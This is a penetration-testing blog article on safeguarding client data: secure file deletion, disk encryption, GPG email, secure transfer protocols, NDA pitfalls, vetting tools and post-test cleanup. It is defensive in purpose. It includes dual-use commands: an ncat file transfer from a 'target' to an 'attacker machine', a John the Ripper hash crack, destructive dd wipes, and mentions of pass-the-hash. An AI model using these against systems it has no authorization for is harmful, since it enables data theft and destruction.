[Editor's Note: As a professional penetration tester, target organization personnel put a lot of trust and faith in us. We must treat their sensitive information very carefully, or else we'll wind up in major hot water. In this thought-provoking article, Tony Turner provides some fantastic tips for protecting pen test customer data. Heed his warnings carefully. The tips he discusses aren't too onerous, and may just save your bacon some day. Thanks, Tony, for the excellent article! --Ed.]
By Tony Turner
It's a good day. You've just received the P.O. from another large customer who has engaged you to perform a penetration test. Fortunately for your customer, you are a professional, and they can rely on your ethics and experience to deliver a quality product that creates significant value in their never-ending struggle to manage technology risk within their environment. They want you to simulate a real attacker, which means you can harvest credit card numbers and sell them on carder forums, post their password hashes on Pastebin and tweet about how lamebrained they are. Right?
Hopefully, you see how ludicrous the last question was and are ready to take a look at how you may be needlessly exposing your customer's data. While you may not be selling customer data, there may be instances where you have exposed customer data almost as haphazardly. Let's take a look at a few of them and see how we can do things better.
As a penetration tester, you probably have one of the most ridiculously large attack surfaces of any system that touches the network, due to the need to support insecure protocols like older versions of NTLM or unsigned SMB, exposed applications listening for incoming connections, and the wide array of tools installed on your platform. That's a given, and I won't touch on platform hardening today, since that's a future topic deserving of its own article. You also probably use the same laptop for testing that you take to hacker conventions and use in the coffee shop, in the hotel, on the airplane and any number of other risky venues. Do you have reports you are currently working on saved to your machine? What about old reports that have already been submitted? How about results of scans with IP information or details of website vulnerabilities?
Data Reduction — If You Don't Have It, You Can't Lose It
- Securely delete data such as old reports, scan data, asset enumeration, etc. that is no longer needed using SDelete on Windows or shred on Linux and delete database records that store sensitive information. If your laptop file system is compromised, you don't want sensitive information from previous or current customers recovered by an attacker.
I usually do a single pass and find that to be sufficient, but if your requirements dictate more than this, you can increase the number of passes with the -p option. The -s option tells SDelete to recurse through directories. If you have files that have been insecurely deleted and need to clean up free space, the -z option is more secure than -c and meets the requirements of the DOD 5220.22-M sanitizing standard. This option first writes 0x00, then 0xFF, and finally random bytes from 0x00 to 0xFF to all free/unused space on the drive. The -c option only writes 0x00 to the drive 3 times and is not DOD compliant. Either method can be very time consuming depending on the amount of free space on the drive.
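The SDelete invocations just described can be sketched as follows. SDelete is a Windows Sysinternals tool, so the commands are guarded here to be a no-op elsewhere, and the paths are hypothetical examples:

```shell
# Hedged sketch of the SDelete usage described above (Windows-only tool;
# the guard lets this run harmlessly on other platforms).
if command -v sdelete >/dev/null 2>&1; then
    sdelete -p 3 -s 'C:\pentest\reports'   # 3 overwrite passes, recurse subdirectories
    sdelete -z C:                          # DOD 5220.22-M wipe of free space on C:
fi
```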
To clean files on Linux-based systems, we can use shred, installed by default on a BackTrack 5 R2 system as well as most modern Linux distributions, or the dd command with /dev/zero or /dev/random as the input file. This is sufficient for most purposes but is not compliant with DOD 5220.22-M.
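As a quick sketch (the file names are just examples), a one-pass shred and a dd overwrite of a small scratch image standing in for external media look like this:

```shell
# Securely overwrite and unlink a file with shred, then use dd with
# /dev/zero to overwrite a scratch image. File names are examples.
echo "old engagement notes" > notes.txt
shred -n 1 -u notes.txt      # -n 1: one overwrite pass; -u: unlink afterward

dd if=/dev/zero of=scratch.img bs=1M count=1 2>/dev/null
```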
The best method I have found on Linux systems to perform a DOD 5220.22-M compliant file sanitization is the scrub command. It is not installed by default on BT5, but if you have 'universe' enabled it can be installed with apt-get. The -p option specifies the pattern used; in this instance I have selected the 'dod' pattern. It follows a similar overwrite pattern to SDelete and then unlinks the file. Without the -r option it will scrub the file but leave the filename intact, which may, in and of itself, reveal information you do not wish to disclose.
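A sketch of that scrub usage, with shred as a fallback where scrub is not installed (the file name is a hypothetical example):

```shell
echo "customer-sensitive scan data" > scan-results.txt

if command -v scrub >/dev/null 2>&1; then
    # -p dod selects the DOD 5220.22-M pattern; -r removes (unlinks)
    # the file afterward so the name itself is not left behind
    scrub -p dod -r scan-results.txt
else
    shred -u scan-results.txt    # fallback when scrub is absent
fi
```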
- Use a placeholder for customer name in your reports in progress to limit exposure before the report is complete and do a "Find and Replace" when you are ready. It is understood there may still be identifying information such as domain names or IP addresses but limit this where possible until you are ready to create the final.
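A minimal sketch of that find-and-replace step, assuming a CUSTOMER_NAME placeholder and hypothetical file and customer names:

```shell
# Working draft uses a placeholder instead of the real customer name
printf 'Findings for CUSTOMER_NAME\nCUSTOMER_NAME should disable SMBv1.\n' > draft.txt

# Substitute the real name only when producing the final report
sed 's/CUSTOMER_NAME/Acme Corp/g' draft.txt > final-report.txt
```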
- Full disk encryption or file encryption at a minimum can be a very effective mechanism for protecting your customer's information. If you are using external drives to store customer data these should be encrypted as well. This really should not be an optional step. There are many articles on the internet that can provide guidance here using Truecrypt, DM-crypt with LUKS or other methods. There are many commercial options in this area as well.
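For example, an encrypted external drive can be set up with dm-crypt/LUKS along these lines. The device name is a hypothetical placeholder, and these commands are destructive, so this is a sketch rather than something to run as-is:

```shell
# Format the external drive with LUKS, open it, and create a file
# system on the mapped device (run as root; /dev/sdb1 is a placeholder)
#   cryptsetup luksFormat /dev/sdb1
#   cryptsetup luksOpen /dev/sdb1 pentest_data
#   mkfs.ext4 /dev/mapper/pentest_data
#   mount /dev/mapper/pentest_data /mnt/pentest_data
```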
- Store sensitive information within a protected environment and work on the report there. If you have a corporate VPN for your consulting practice, leverage the security controls you already have in place and minimize the local file storage of sensitive information. This can be especially effective when collaborating with other members of your team as you can utilize a shared portal such as a wiki or internal collaboration platform. You will most likely need to utilize a separate virtual machine that complies with your internal security requirements for VPN and corporate policy. This has the added benefit of separating working documentation from the default build of your insecure testing platform.
- Once you have a solid working build of your base platform, create a disk image. When you are done with an assessment, securely wipe and reimage your machine. scrub and SDelete work great for groups of files or directories, but for complete drive sanitization I tend to use Darik's Boot and Nuke (DBAN), which is also DOD 5220.22-M compliant. Make sure that if you create any custom scripts you save them for reuse on future tests, but sanitize any customer details contained within. Also be sure to securely wipe any external media containing sensitive information. dd can again come in very handy here. I have a Clonezilla server I use for this purpose, which makes reimaging my laptop relatively painless. Clonezilla can work with dd images if you have already created an image of your system.
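As a rough sketch, capturing and restoring a base image with dd looks like this. The device and paths are hypothetical, and this must be run from live media rather than the running system:

```shell
#   dd if=/dev/sda of=/mnt/backup/base-build.img bs=4M    # capture the base image
#   dd if=/mnt/backup/base-build.img of=/dev/sda bs=4M    # restore it after the engagement
```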
- Don't leave systems with hacking tools installed plugged into the network, as you will only make life easier for criminal attackers. You should use a different system for day-to-day activities, or if you only have one machine, consider the use of a virtual machine for your pentest platform and keep it powered down when not in use.
- Depending on the requirements of the assessment, you may be tasked with retaining report information for a predetermined timeframe; 1 year seems to be common. Secure this data on encrypted external media and put it in your safe until the retention period expires and then securely destroy the information.
So, now you feel pretty good about the security of the data at rest you are responsible for safeguarding. You are engaged in the assessment and you compromise a server, only to find that there are compiled exploits sitting in the file system or some other indicators of compromise, or maybe it's just time to submit the deliverables. Immediately you rush to contact the customer, but you can't reach them on the phone, so you send them an email with this information. Email is cleartext. Do you have PGP or GPG installed? Do you have your customer point of contact's public key?
- Use PGP. PGP is relatively inexpensive, but if you are operating on a budget, GPG can fit the bill as well. Using the GPG implementation of OpenPGP together with Enigmail and Thunderbird provides a free alternative to commercial PGP. The Enigmail site listed at the end of this article includes detailed instructions for setup.
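A minimal GPG sketch follows. The file contents and passphrase are hypothetical; in practice you encrypt to your customer contact's public key with -e -r, while the symmetric -c mode below just keeps the example self-contained:

```shell
echo "indicator of compromise on 10.0.0.5" > findings.txt

if command -v gpg >/dev/null 2>&1; then
    # Symmetric mode (-c) so the sketch runs without a keyring;
    # the passphrase is an example only
    gpg --batch --yes --pinentry-mode loopback --passphrase 'demo-only' \
        -c -o findings.txt.gpg findings.txt
fi

# Typical real-world usage: encrypt to the customer's public key
#   gpg -e -a -r security@customer.example findings.txt
```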
- Use SFTP or FTPS or another secure file transfer mechanism. You could always send an unsecured email telling your customer to check the portal and they can log in and see for themselves what you are talking about. I'm going to take a minute to talk about FTPS vs SFTP vs SCP since there seems to be a great deal of confusion here. Many people think they are interchangeable but that is definitely not the case.
SCP is an older secure copy implementation that supports file transfer only and uses the vulnerable SSHv1 protocol for authentication and transport. It does not support directory listing and typically functions as both a client and a server. Modern versions of SSH include SCP2, which does provide support for SSHv2, and in many instances on a modern Linux system, when you type 'scp' you may actually get a symbolic link to SCP2 or even SFTP. GUI-based SCP clients such as WinSCP usually don't use SCP as the default mechanism, since functionality such as directory listing is necessary for operation. Instead they use SFTP, falling back to SCP or SCP2, but even then it is not usually pure SCP, as they must employ other mechanisms for directory listing and other functionality such as resumption of failed file transfers. Because of this, platform dependencies may create situations where WinSCP fails to negotiate an SCP connection while a pure SCP client, such as the one found at the command line in most Linux distributions, will work.
SFTP does not use FTP mechanisms for file transfer; it is instead a newer protocol designed to be run over SSH or other secure transport mechanisms such as TLS. It relies on the transport mechanism to provide authentication and security. It is a true remote file management protocol with full support for directory browsing, file transfer, resumption of failed transfers and deletion of remote files. OpenSSH, one of the most popular SSH suites, includes both SCP and SFTP functionality. This is likely to be the most easily supported and secure of these options when considering secure transfer mechanisms.
FTPS is the last protocol we will discuss and is designed to function as FTP over SSL/TLS. It is truly an extension to FTP and, in its explicit security mode, is compatible with non-FTPS-aware clients. In explicit mode, the client must explicitly request a secured channel using the FTP command 'AUTH', and the two sides then mutually agree on an encryption method. Non-FTPS-aware clients do not use this AUTH command, and the server can then accept or deny the incoming connection based on configured policies. The client has full control over what is encrypted and may drop encryption for a given channel at any time, contingent on the server's policies. In implicit mode, it is assumed that all communications will be encrypted, and non-FTPS-aware clients will not be able to negotiate a connection. FTPS supports the full range of SSL/TLS encryption ciphers and hashing mechanisms, as well as client-side certificates. Due to the nature of FTP, default firewall configurations will present challenges, since the firewall cannot inspect the encrypted FTP control channel messages to determine which data channel ports need to be opened to facilitate communication. It is not recommended for use across such connections, as the range of ports that would need to be opened may present unnecessary risk, but for internal secure file transfer or for communication across a layer 3 VPN it can certainly be a viable option.
- When moving files and data around your customer's network, use encrypted channels where possible. Perhaps your initial compromise was facilitated by the use of netcat or telnet or bash tcp redirection or some other mechanism that does not offer encryption. Establish secure channels as soon as possible using SSH, cryptcat, ncat, SSL, VPN or other mechanism before continuing the attack and especially before pilfering all of your customer's sensitive information.
Ncat is an alternative to netcat as an improved implementation found in the nmap suite of tools. A statically linked binary can be obtained from nmap.org so it can just be copied to the target system and invoked without installation. This is probably the easiest way to get encryption support for a Netcat style tool on Windows. One of the really nice things here is the ability to specify hosts that are allowed or denied the ability to connect to the ncat listener so you can limit exposure for your ncat connection, and specify a number of connections for times when you are working with teammates who also need to leverage the connection. That's just not possible with traditional netcat without some additional hackery. Ncat also supports authenticated proxies and as you will see next, SSL.
First off, an example with traditional netcat transferring a text file, lewtz.txt, with the contents "phat lewtz" from a Windows 7 target to an Ubuntu 10.04 attacker machine.
In the packet capture, you can clearly see the plaintext string "phat lewtz" as it traverses the network.
Now let's try the exact same file transfer using ncat and the --ssl option.
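That transfer looks something like the following sketch, with localhost standing in for the two hosts and the commands guarded in case ncat is not installed:

```shell
echo "phat lewtz" > lewtz.txt

if command -v ncat >/dev/null 2>&1; then
    # Listener on the attacker side; ncat generates a temporary SSL cert
    ncat --ssl -l 4444 > received.txt &
    sleep 1
    # Sender on the target side; --send-only closes after end-of-file
    ncat --ssl --send-only localhost 4444 < lewtz.txt
    wait
fi
```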
Looking at the SSL-encrypted packet, the contents appear to be sufficiently obfuscated. It is also possible to supply your own certs for additional trust verification.
- Don't conduct your tests from insecure locations like coffee shops or hotel wifi. If you absolutely must, consider tunneling your traffic over SSH or using a VPN through a server on the internet under your control.
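For instance, a SOCKS proxy over SSH to a server you control can be set up along these lines (the host name is a hypothetical example):

```shell
# Open a dynamic (SOCKS) forward on local port 1080, then point your
# tools' proxy settings at localhost:1080 so traffic leaves via your server
#   ssh -D 1080 -N pentester@vps.example.com
```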
Now we have secured our local systems to some degree and are protecting customer information as it flows across the network and/or the internet. Great job! You probably signed an NDA promising that you would not disclose any information to 3rd parties. Yes, that means you don't tweet about how lamebrained your customer is or make a blog post about their shortcomings, and you probably already know that. But are you consuming any 3rd-party services to assist you with your test? Does use of Netcraft, Nmap Online, or Firebind violate the terms of your NDA? It probably does. How about posts made to mailing lists regarding working through ongoing issues in your test?
In 2011 I saw an email to the Metasploit Framework mailing list asking for exploit/windows/smb/psexec assistance, with the show options screen pasted in, including username, password hash and public IP address. That's a huge exposure that should be a resume generating event (RGE). Thankfully, Rapid7 redacted that information from the public mailing list archives, but not all list or forum administrators are as diligent. Internal folks do this all the time, posting code snippets on Pastebin or revealing configuration information on mailing lists that are often searchable using Google Groups or other means; this is hugely valuable information when you are conducting your test. Lead by example and educate your customers.
Another disturbing trend is the use of online password crackers. These are sites where you upload a hash, they crack it, and they give you the results; services for WPA, MD5, SHA1, NTLM and various other hash types can be found on the internet. Testers have no control over these sites or how they use the information, and they degrade the quality of good passwords by exposing them to such services, in addition to violating their NDA. Uploading hashes to Pastebin so your partner can crack them is also a really bad idea. Refer to the previous sections on securing data at rest and in transit, and only use systems under your control for cracking passwords. Pass-the-Hash attacks with Windows Credential Editor may completely obviate the need to crack hashes for Windows-based systems or Linux systems using Samba. Use the right tool for the job.
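As a sketch of cracking locally instead, here is a toy MD5 hash and wordlist fed to John the Ripper. The hash, usernames, and wordlist are deliberately trivial examples, and the commands are guarded in case john, or its raw-md5 format, is unavailable:

```shell
# MD5 of "password": a deliberately weak toy example
printf 'user:5f4dcc3b5aa765d61d8327deb882cf99\n' > hashes.txt
printf 'letmein\npassword\n' > wordlist.txt

if command -v john >/dev/null 2>&1; then
    john --format=raw-md5 --wordlist=wordlist.txt hashes.txt || true
    john --show --format=raw-md5 hashes.txt || true
fi
```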
Untrusted Tools — What Could Possibly Go Wrong?
Another way we expose customer data to 3rd parties is accidental. We've all been in a situation where we are faced with a particular problem that requires a custom tool. After doing some research, we determine we could whip something up with an hour or two's worth of Perl or Python, or maybe just a nice bash script. Or we could download a tool some unknown individual created and posted to a blog or a mailing list. I've seen this many times, where penetration testers are using untested tools in customer environments without first trying them out in a controlled lab environment. Test your tools before using them at customer sites. Read the source code. Fire up a packet sniffer and see where the traffic goes. Treat the tool like malware until you are reasonably assured that it's not. You need to understand how tools work to make sure they aren't phoning home, creating undue instability in target systems, or exposing backdoors on your or your customer's systems. Yes, this takes time, likely unbillable time. It's an investment in quality and a reinforcement of trust for your customers. If they ask you what a particular tool does, you need to be prepared to tell them.
Clean Up After Yourself — Didn't Your Momma Teach You Anything?
Last but not least, clean up after yourself. Don't leave compiled exploits, GCC installs, hash dumps and other artifacts behind. The point of the test is to assess your target environment and communicate valuable insight into the technology risks that can compromise the organization's business objectives. If you know a compromised system is now unstable due to the exploit used, tell the customer, or better yet, find a more stable means of gaining access. If you are leaving behind systems that are more vulnerable than when you found them, you are harming your customer and you may be found liable. Don't expect repeat business.
Penetration testers find themselves in a unique position where a tremendous amount of trust is placed in them. Customers have expectations that pentesters will responsibly and securely manage the assessment process and often do not understand enough to hold testers accountable. The idea that a consultant hired to perform a security assessment might not actually follow their own recommendations and create additional risk when conducting an assessment should be preposterous to most of us. Take the time to do it right. I hope this article provides a sufficient baseline for both testers and customers alike to understand what should be expected from a responsible penetration test.
About the author:
Tony Turner is an information technology veteran of over 18 years, the last 7 in information security. He has a B.S. in Information Systems Management with a focus in Information Security and Compliance from Hodges University and holds several information security certifications including GSEC, GPEN, GWAPT, GAWN, GCIA, CISSP, CISA, OPSE, CSWAE and others. Tony currently manages the information security program for a major US airport where he is responsible for penetration testing and vulnerability assessment, CSIRT coordination, compliance and policy. He is the chapter leader for OWASP Orlando and speaks regularly at DC407, OWASP, and area information security forums and events. Tony also maintains a newly created blog at http://sentinel24.com/blog where you can read about his current research.
-- Tony Turner
Download links for tools discussed: